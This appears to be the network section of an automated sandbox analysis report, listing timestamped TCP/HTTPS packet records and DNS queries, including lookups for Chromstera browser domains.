                                                                                                                                                                            Oct 28, 2024 19:13:06.388705015 CET4435928213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:06.405464888 CET4435928313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:06.405896902 CET59283443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:06.405913115 CET4435928313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:06.406313896 CET59283443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:06.406320095 CET4435928313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.772270918 CET59290443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:07.772285938 CET44359290162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.772604942 CET59291443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:07.772708893 CET44359291162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.772816896 CET44359290162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.773586035 CET59287443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:07.773586035 CET59287443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:07.773621082 CET4435928713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.773633003 CET4435928713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.773921013 CET59288443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:07.773938894 CET4435928813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.773948908 CET59288443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:07.773952961 CET4435928813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.774256945 CET59290443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:07.774344921 CET44359290162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.775553942 CET59289443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:07.775590897 CET4435928913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.775626898 CET59289443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:07.775643110 CET4435928913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.779819965 CET59294443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:07.779872894 CET4435929413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.779990911 CET59294443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:07.781056881 CET59295443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:07.781083107 CET4435929513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.781271935 CET59295443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:07.781708956 CET59294443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:07.781722069 CET4435929413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.781789064 CET59295443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:07.781797886 CET4435929513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.783077002 CET59296443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:07.783159018 CET4435929613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.783480883 CET59296443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:07.783617973 CET59296443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:07.783653975 CET4435929613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.822594881 CET59290443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:07.822603941 CET59291443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:07.913631916 CET59297443192.168.2.423.218.232.185
                                                                                                                                                                            Oct 28, 2024 19:13:07.913685083 CET4435929723.218.232.185192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.913765907 CET59297443192.168.2.423.218.232.185
                                                                                                                                                                            Oct 28, 2024 19:13:07.913928032 CET59297443192.168.2.423.218.232.185
                                                                                                                                                                            Oct 28, 2024 19:13:07.913952112 CET4435929723.218.232.185192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.107880116 CET4435929213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.108531952 CET59292443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:08.108560085 CET4435929213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.109019041 CET59292443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:08.109024048 CET4435929213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.152079105 CET4435929313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.154381990 CET59293443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:08.154406071 CET4435929313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.154875040 CET59293443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:08.154879093 CET4435929313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.248300076 CET4435929213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.248337030 CET4435929213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.248405933 CET4435929213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.248404980 CET59292443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:08.248450041 CET59292443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:08.248636961 CET59292443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:08.248653889 CET4435929213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.248672009 CET59292443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:08.248676062 CET4435929213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.251961946 CET59298443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:08.252047062 CET4435929813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.252243996 CET59298443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:08.252413034 CET59298443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:08.252449036 CET4435929813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.290237904 CET4435929313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.290266037 CET4435929313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.290321112 CET59293443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:08.290334940 CET4435929313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.290380001 CET59293443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:08.290555954 CET59293443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:08.290565968 CET4435929313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.290577888 CET59293443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:08.290581942 CET4435929313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.294056892 CET59299443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:08.294090986 CET4435929913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.294157028 CET59299443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:08.294390917 CET59299443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:08.294399023 CET4435929913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.522315025 CET4435929723.218.232.185192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.522600889 CET59297443192.168.2.423.218.232.185
                                                                                                                                                                            Oct 28, 2024 19:13:08.522614956 CET4435929723.218.232.185192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.523633003 CET4435929723.218.232.185192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.523706913 CET59297443192.168.2.423.218.232.185
                                                                                                                                                                            Oct 28, 2024 19:13:08.524880886 CET59297443192.168.2.423.218.232.185
                                                                                                                                                                            Oct 28, 2024 19:13:08.524943113 CET4435929723.218.232.185192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.525185108 CET59297443192.168.2.423.218.232.185
                                                                                                                                                                            Oct 28, 2024 19:13:08.525191069 CET4435929723.218.232.185192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.537113905 CET4435929513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.538170099 CET59295443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:08.538183928 CET4435929513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.538826942 CET59295443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:08.538830996 CET4435929513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.541852951 CET4435929413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.542402983 CET4435929613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.542637110 CET59294443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:08.542666912 CET4435929413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.543632984 CET59294443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:08.543642998 CET4435929413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.545727015 CET59296443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:08.545798063 CET4435929613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.551479101 CET59296443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:08.551503897 CET4435929613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.572624922 CET59297443192.168.2.423.218.232.185
                                                                                                                                                                            Oct 28, 2024 19:13:08.674711943 CET4435929513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.674741030 CET4435929513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.674768925 CET4435929723.218.232.185192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.674798965 CET4435929513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.674804926 CET4435929723.218.232.185192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.674813032 CET59295443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:08.674841881 CET4435929723.218.232.185192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.674854994 CET4435929723.218.232.185192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.674877882 CET59297443192.168.2.423.218.232.185
                                                                                                                                                                            Oct 28, 2024 19:13:08.674885988 CET59295443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:08.674890995 CET4435929723.218.232.185192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.674902916 CET4435929723.218.232.185192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.979337931 CET4435930213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.980123043 CET59302443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:09.980123043 CET59302443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:09.980123997 CET59302443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:09.982918978 CET59311443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:09.982947111 CET4435931113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.983088017 CET59311443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:09.983238935 CET59311443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:09.983253002 CET4435931113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.116391897 CET4435930613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.118535995 CET59306443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:10.118557930 CET4435930613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.118614912 CET59306443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:10.118623018 CET4435930613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.120059013 CET4435930713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.120634079 CET59307443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:10.120671988 CET4435930713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.123025894 CET59307443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:10.123034000 CET4435930713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.197643995 CET59302443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:10.197714090 CET4435930213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.255160093 CET4435930613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.255238056 CET4435930613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.255383015 CET59306443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:10.255544901 CET59306443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:10.255544901 CET59306443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:10.255559921 CET4435930613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.255568981 CET4435930613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.256673098 CET4435930713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.256745100 CET4435930713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.256858110 CET4435930713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.256906986 CET59307443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:10.256970882 CET59307443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:10.256970882 CET59307443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:10.257009029 CET4435930713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.257045031 CET59307443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:10.257061005 CET4435930713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.258644104 CET59312443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:10.258690119 CET4435931213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.258857012 CET59312443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:10.258979082 CET59312443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:10.259006977 CET4435931213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.353194952 CET4435930813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.353740931 CET59308443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:10.353786945 CET4435930813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.354187012 CET59308443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:10.354191065 CET4435930813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.471467972 CET4435931013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.471968889 CET59310443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:10.471993923 CET4435931013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.472476006 CET59310443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:10.472481012 CET4435931013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.491530895 CET4435930813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.491631031 CET4435930813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.491779089 CET59308443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:10.491837025 CET59308443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:10.491851091 CET4435930813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.491862059 CET59308443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:10.491866112 CET4435930813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.615745068 CET4435931013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.615825891 CET4435931013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.615891933 CET59310443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:10.616117001 CET59310443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:10.616137028 CET4435931013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.616142988 CET59310443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:10.616147041 CET4435931013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.740515947 CET4435931113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.741049051 CET59311443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:10.741072893 CET4435931113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.741513014 CET59311443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:10.741517067 CET4435931113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.901302099 CET4435931113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.901381016 CET4435931113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.901506901 CET59311443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:10.901757002 CET59311443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:10.901772022 CET4435931113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:11.033288956 CET4435931213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:11.033816099 CET59312443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:11.033847094 CET4435931213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:11.034271955 CET59312443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:11.034284115 CET4435931213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:11.173716068 CET4435931213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:11.173867941 CET4435931213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:11.173955917 CET59312443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:11.174067974 CET59312443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:11.174099922 CET4435931213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:11.174124002 CET59312443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:11.174139023 CET4435931213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:22.580668926 CET44359290162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:22.580770969 CET44359290162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:22.580827951 CET59290443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:22.581038952 CET44359291162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:22.581120014 CET44359291162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:22.581182957 CET59291443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:24.402502060 CET44359303162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:24.402575970 CET44359303162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:24.402638912 CET59303443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:24.403019905 CET44359304162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:24.403116941 CET44359304162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:24.403255939 CET59304443192.168.2.4162.159.61.3
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                            Oct 28, 2024 19:13:07.706444025 CET44354985162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.706598043 CET44354985162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.706667900 CET44354985162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.771847010 CET54985443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:07.772353888 CET54985443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:07.773370028 CET54985443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:07.773730040 CET54985443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:07.775288105 CET54985443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:07.775537968 CET54985443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:07.902520895 CET44354985162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.904433966 CET44354985162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.904467106 CET44354985162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.904500961 CET44354985162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.904527903 CET44354985162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.904555082 CET44354985162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.904814959 CET54985443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:07.904908895 CET54985443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:07.907526016 CET44354985162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.909236908 CET44354985162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.912955046 CET44354985162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.913145065 CET54985443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:08.035670996 CET44354985162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.073163986 CET54985443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:08.912986994 CET54985443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:08.913583040 CET54985443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:08.914603949 CET57399443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:09.044794083 CET44354985162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.045643091 CET44354985162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.045939922 CET44354985162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.046117067 CET54985443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:09.229234934 CET57399443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:09.516971111 CET44357399162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.517033100 CET44357399162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.517070055 CET44357399162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.517106056 CET44357399162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.517647028 CET57399443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:09.519016027 CET57399443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:09.519016027 CET57399443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:09.519254923 CET57399443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:09.523359060 CET57399443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:09.643011093 CET44357399162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.643048048 CET44357399162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.643081903 CET44357399162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.643109083 CET44357399162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.643481970 CET57399443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:09.643481970 CET57399443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:09.644223928 CET44357399162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.647253036 CET44357399162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.648103952 CET44357399162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.648319006 CET57399443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:09.979228020 CET44357399162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.011090040 CET57399443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:10.027966976 CET44357399162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.057173967 CET57399443192.168.2.4162.159.61.3
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 28, 2024 19:11:31.024566889 CET | 192.168.2.4 | 1.1.1.1 | 0x38a | Standard query (0) | chromsterabrowser.com | A (IP address) | IN (0x0001) | false
Oct 28, 2024 19:11:31.031095028 CET | 192.168.2.4 | 1.1.1.1 | 0x5734 | Standard query (0) | secure.chromstera.com | A (IP address) | IN (0x0001) | false
Oct 28, 2024 19:11:31.037179947 CET | 192.168.2.4 | 1.1.1.1 | 0xf77 | Standard query (0) | chromsteraupdates.com | A (IP address) | IN (0x0001) | false
Oct 28, 2024 19:12:48.145174980 CET | 192.168.2.4 | 1.1.1.1 | 0xa913 | Standard query (0) | clients2.googleusercontent.com | A (IP address) | IN (0x0001) | false
Oct 28, 2024 19:12:48.145471096 CET | 192.168.2.4 | 1.1.1.1 | 0xabb2 | Standard query (0) | clients2.googleusercontent.com | 65 | IN (0x0001) | false
Oct 28, 2024 19:12:51.605990887 CET | 192.168.2.4 | 1.1.1.1 | 0xf48c | Standard query (0) | chrome.cloudflare-dns.com | A (IP address) | IN (0x0001) | false
Oct 28, 2024 19:12:51.606127024 CET | 192.168.2.4 | 1.1.1.1 | 0xa8c4 | Standard query (0) | chrome.cloudflare-dns.com | 65 | IN (0x0001) | false
Oct 28, 2024 19:12:51.606563091 CET | 192.168.2.4 | 1.1.1.1 | 0xdf7b | Standard query (0) | chrome.cloudflare-dns.com | A (IP address) | IN (0x0001) | false
Oct 28, 2024 19:12:51.606736898 CET | 192.168.2.4 | 1.1.1.1 | 0x319f | Standard query (0) | chrome.cloudflare-dns.com | 65 | IN (0x0001) | false
Oct 28, 2024 19:12:51.800295115 CET | 192.168.2.4 | 1.1.1.1 | 0xe8d4 | Standard query (0) | chrome.cloudflare-dns.com | A (IP address) | IN (0x0001) | false
